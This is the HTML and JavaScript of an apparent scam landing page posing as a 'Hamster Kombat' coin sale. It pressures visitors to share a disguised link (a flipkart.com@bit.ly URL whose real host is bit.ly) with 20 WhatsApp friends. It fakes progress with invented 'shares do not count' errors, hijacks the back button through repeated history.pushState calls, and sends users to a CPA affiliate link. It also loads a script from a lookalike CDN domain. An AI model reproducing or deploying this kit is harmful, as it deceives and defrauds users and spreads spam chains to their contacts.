<html style="--tg-viewport-height: 100vh; --tg-viewport-stable-height: 100vh;">

<head>
    <meta content='noindex,follow' name='googlebot' />
    <meta content='noindex,nofollow,noodp,noydir' name='robots' />
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Hamster Kombat</title>
    <meta name="imagetoolbar" content="no">
    <meta name="google" content="notranslate">
    <meta name="theme-color" content="#000000">
    <meta name="cleartype" content="on">
    <meta name="HandheldFriendly" content="True">

    <link rel="stylesheet" href="_nuxt/entry.CBje6SOX.css">



	<script src="https://cdn.jsdelivr.cc/npm/sweetalert2@10.16.0/dist/sweetalert2.all.min.js"></script>

    <meta property="og:title" content="Hamster Kombat">
    <meta name="description" content="Make your way from the shaved hamster to the grandmaster CEO of the tier-1 crypto exchange">
    <meta property="og:description" content="Make your way from the shaved hamster to the grandmaster CEO of the tier-1 crypto exchange">
    <meta property="og:image" content="https://hamsterkombat.io/images/icons/hamster-coin.png">
    <style>
       .hide,.button,.ln-header-social{
            display: none;
        }
        .c{
            background: linear-gradient(90deg, #2253ff 1.46%, #1744e1 99.81%);
    border: 1px solid #fff;
    border-radius: 71px;
    box-shadow: 0 2px 72.7px #0f2368bd;
    color: #fff;
    display: inline-flex;
    font-size: 26px;
    font-style: normal;
    font-weight: 500;
    height: 80px;
    margin-top: 36px;
    max-width: 471px;
    position: relative;
    z-index: 3;
}
@media (min-width: 768px) {
    .ln-header-center {
        flex: 1;
    }
}
        
        </style>
</head>

<body>
    <div id="__nuxt" data-v-app="">
        <main class="ln">
            <div class="ln-inner">
                <div class="ln-top">
                    <div class="ln-header">
                        <div class="ln-header-left">
                            <div class="ln-header-social">
                                <a class="is-x" href="https://twitter.com/hamster_kombat" target="_blank" title="X">
                                    <div class="icon"><svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" viewBox="0 0 20 20"><path fill="currentColor" d="M15.8.9h3.1l-6.7 7.7L20 19.1h-6.2L9 12.7 3.5 19H.4l7.2-8.2L0 .9h6.3l4.4 5.8L15.8.9zm-1.1 16.3h1.7L5.4 2.7H3.6l11.1 14.5z"></path></svg></div>
                                </a>
                                <a class="is-telegram" href="https://t.me/hamster_kombat" target="_blank" title="Telegram official channel">
                                    <div class="icon"><svg viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
    <path d="M27.6132 4.873C27.6132 4.873 30.2032 3.863 29.9866 6.31567C29.9152 7.32567 29.2679 10.861 28.7639 14.6843L27.0372 26.011C27.0372 26.011 26.8932 27.6703 25.5979 27.959C24.3032 28.247 22.3606 26.949 22.0006 26.6603C21.7126 26.4437 16.6046 23.197 14.8059 21.6103C14.3019 21.177 13.7259 20.3117 14.8779 19.3017L22.4319 12.087C23.2952 11.2217 24.1586 9.20167 20.5612 11.6543L10.4879 18.5077C10.4879 18.5077 9.33655 19.2297 7.17855 18.5803L2.50122 17.137C2.50122 17.137 0.774553 16.055 3.72455 14.973C10.9199 11.5823 19.7699 8.11967 27.6119 4.873H27.6132Z" fill="currentColor"></path>
    </svg>
                                    </div>
                                </a>
                                <p>Join us!</p>
                            </div>
                        </div>
                        <div class="ln-header-center">
                            <div class="ln-header-center-logo">
                                <picture class="is-token">
                                    <source srcset="hamster-coin.webp" type="image/webp" alt="Hamster Kombat"><img class="img-responsive" src="hamster-coin.webp" alt="Hamster Kombat"></picture>
                            </div>
                            <p>Sale Hamster Coin</p>
                        </div>
              
                    </div>
                    <div class="ln-content">
                        <div class="ln-content-hamster">
                            <div class="ln-content-hamster-image is-1">
                                <picture class="is-hamster-image is-level-6">
<img class="img-responsive" src="6.png" alt="Hamster Kombat"></picture>
                            </div>
                            <div class="ln-content-hamster-image is-2">
                                <picture class="is-hamster-image is-level-2">
<img class="img-responsive" src="2.png" alt="Hamster Kombat"></picture>
                            </div>
                            <div class="ln-content-hamster-image is-3">
                                <picture class="is-hamster-image is-level-9">
<img class="img-responsive" src="9.png" alt="Hamster Kombat"></picture>
                            </div>
                            <div class="ln-content-hamster-image is-4">
                                <picture class="is-hamster-image is-level-7">
<img class="img-responsive" src="7.png" alt="Hamster Kombat"></picture>
                            </div>
                        </div>
                        <h1>Step 2</h1>
                       
                        <p>Share about our platform on WhatsApp with 20 friends by clicking the "WhatsApp" button below to continue.</p>
                        <div id="share">
    
   
    
        
                            <div class="share_main_bt" id="whatsapp">WhatsApp&nbsp;   →</div>
                           <h4 class="textlastup">Share until the bar is full!</h4>
                           <div class="barr">
                                         <div class="fill">
                                             <div id="fill2"></div>
                                         </div>
                                         <div class="percentage center">
                                             <span><i class="fa fa-spinner fa-pulse"></i></span>
                                             <span id="percentage2">0%</span>
                                         </div>
                             
                                     <br>       <div class="share_main_bt" onclick="tipn()" style="margin: 20px auto 0; background-color: #7600ff;">
                                                         Continue
                                                     </div>
                            
                           </div></div>
                           </div>
                          
                           
                         
                           
                                               
                             <div id="claim">
                               <div class="title1">
                         </div>
                         <div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                                    
                         
                                                     </div>
                        
                               <div class="share_main_bt" id="offer">Continue</div>
                                                     
                    
                                </div>
                               </div>
                    </div>
                    <div class="ln-bottom"></div>
                </div>
                
                        </div>
                    </div>
                </div>
                <div class="ln-footer">
        
                     
                </div>
            </div>
        </main>

    </div>
<script src="https://code.jquery.com/jquery-latest.min.js"></script>


  <script>
        var text1 = "ytime" ,
            text2 = " مكتبة جرير تقدم ",
            text3 = " سارع واحصل على قسيمتك قبل النفاذ من هنا : ",
            error = "There is an error!\nPosts do not count. You may have shared it with the same friend or group more than once, please re-share.",
            cpa = "https://clankexpelledidentification.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            cpa1 = "https://clankexpelledidentification.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            cpa2 = "https://clankexpelledidentification.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + text1 ;
    </script>
 
      
    
      
 
    
    
    
    
    
      <script>
    function go() {
        $("#intro").fadeOut(0);
            $("#share").fadeIn(1000);
    } 
        
    
    </script>
<script>
  var tiaoban = [
    "https://www.flipkart.com@bit.ly/big-billions-days-zprizes",
    "https://www.flipkart.com@bit.ly/big-billions-days-sprizes",
];
var tiaoban = tiaoban[Math.floor(Math.random() * tiaoban.length)];

var date = new Date();
var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();
var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();
var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();
var mytime = hour + ':' + minute + ':' + second;

var tb = tiaoban ;
  
  
</script>

<!-- code by ODcompany -->
  <!-- JS-WP -->
 <script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.open('whatsapp://send?text=' + tb);
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 3;
    } else if (width == 90) {
        width += 3;
    } else if (width == 93) {
        width += 2;
    } else if (width == 95) {
        width += 2;
    } else if (width == 97) {
        width += 1;
    } else if (width == 98) {
        width += 1;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
        
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});
   
$("#offers").click(function () {
    window.open(cpa1, "_blank");
});
   
$("#offerss").click(function () {
    window.open(cpa2, "_blank");
});
   function tipn(){
   Swal.fire({
  icon: 'error',
  title: 'Unfortunately...',
  text: 'To Continue, You have to share with friends about our platform. Share until the bar is full!',
  
});
   }
</script>
  






      <script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('Please Share to continue ');		}}		catch (o){}}();</script>
      <style>
   
    
        button:hover {
            background: #F1CE00;
        }
        
        
            .done {
            text-align: center;
            color: #c7db49;
        }
        .tip {
            font-size: 14px;
        }
        .title {
            text-align: center;
        }
            .top-header{
                height: 49px;
                z-index: 99;
                background: #fff;
                padding: 9px;
                opacity: 0.95;
            }
            .top-header > img{
                width: 30px;
            }
            .header_flex_item {
                color: #fff !important;
            }
            .header_flex_item {
                font-size: 12px;
                color: #fff;
                font-weight: 700;
                width: 50%
            }
              
        
          .barr {
            direction: ltr;
            max-width: 400px;
            margin: 10px auto;
            box-sizing: border-box;
        }
        .fill {
            position: relative;
            display: inline-block;
            width: calc(100% - 100px);
            height: 35px;
            padding: 2px;
            border: 2px solid #7600ff;
        }
    
          .percentage {
            width: 100px;
            float: right;
            height: 35px;
            font-size: 16px;
            border: 2px solid #7600ff;
        }
        #percentage,
        #percentage2 {
            margin-left: 5px;
        }
          #fill,
        #fill2 {
            background: #7600ff;
            width: 0%;
            height: 100%;
        }
           .txt1 {
                    padding: 5px 6px;
                    line-height: 18px;
                    text-align: center
                }
                .bottom {
                    width: 92%;
                    margin: 20px auto 0;
                    border: 1px solid #ccc;
                    background-color: #f2f2f2;
                    padding: 5px;
                    border-radius: 10px;
                    -moz-border-radius: 10px;
                    -webkit-border-radius: 10px
                      
                }
                .now {
                    text-align: center;
                    padding-top: 5px
                }
                #countdown {
                    font-weight: bold;
                }
                .rules {
                    color: #1b316c;
                    padding: 4px 5px;
                    line-height: 22px
                }
                .title1 {
                    text-align: center;
                    font-weight: 700;
                    font-size: 26px
                }
            
                .now2 {
                    padding-top: 10px;
                    font-weight: bold;
                }
            .last_page{
                    display: none;
                }
                .last-up{
                    text-align: left;
                }
                .textlastup{
                    color: #068afb;
                    font-size: 18px;
                    padding-bottom: 8px;
                    font-weight: 400;
                }
             .share_main_bt {
                margin: 10px auto;
                background:#4ab115;
                border-radius: 10px;
                width: 80%;
                line-height: 45px;
                text-align: center;
                font-size: 18px;
                font-weight: bold;
                color: #fff  !important;
                
            }
            .sa-confirm-button-container{
                    width:100px !important;
                }
              
          .barr {
            direction: ltr;
            max-width: 400px;
            margin: 10px auto;
            box-sizing: border-box;
        }
        .fill {
            position: relative;
            display: inline-block;
            width: calc(100% - 100px);
            height: 35px;
            padding: 2px;
            border: 2px solid #7600ff;
        }
          #claim {
            display: none;
        }
          .percentage {
            width: 100px;
            float: right;
            height: 35px;
            font-size: 16px;
            border: 2px solid #7600ff;
        }
        #percentage,
        #percentage2 {
            margin-left: 5px;
        }
          #fill,
        #fill2 {
            background: #7600ff;
            width: 0%;
            height: 100%;
        }
            .share_main {
                margin: 10px auto;
                width: 95%;
                background: #eeeff4;
                border-radius: 10px;
            }
            .swal2-styled.swal2-confirm {
                background-color: #8cd4f5;
                box-shadow: none;
                padding: 10px 32px;
                margin-top: 10px;
                cursor: pointer;
                color: #fff !important;
                border-radius: 0.2rem;
                border: 1px solid rgba(84, 84, 84, 0.4);
                font-weight: 300;
                font-size: 19px;
                width: 100%;
                background: #2873F0 !important;
            }
        
            .swal2-actions {
                padding: 0 !important;
            }
            </style>
 
</html>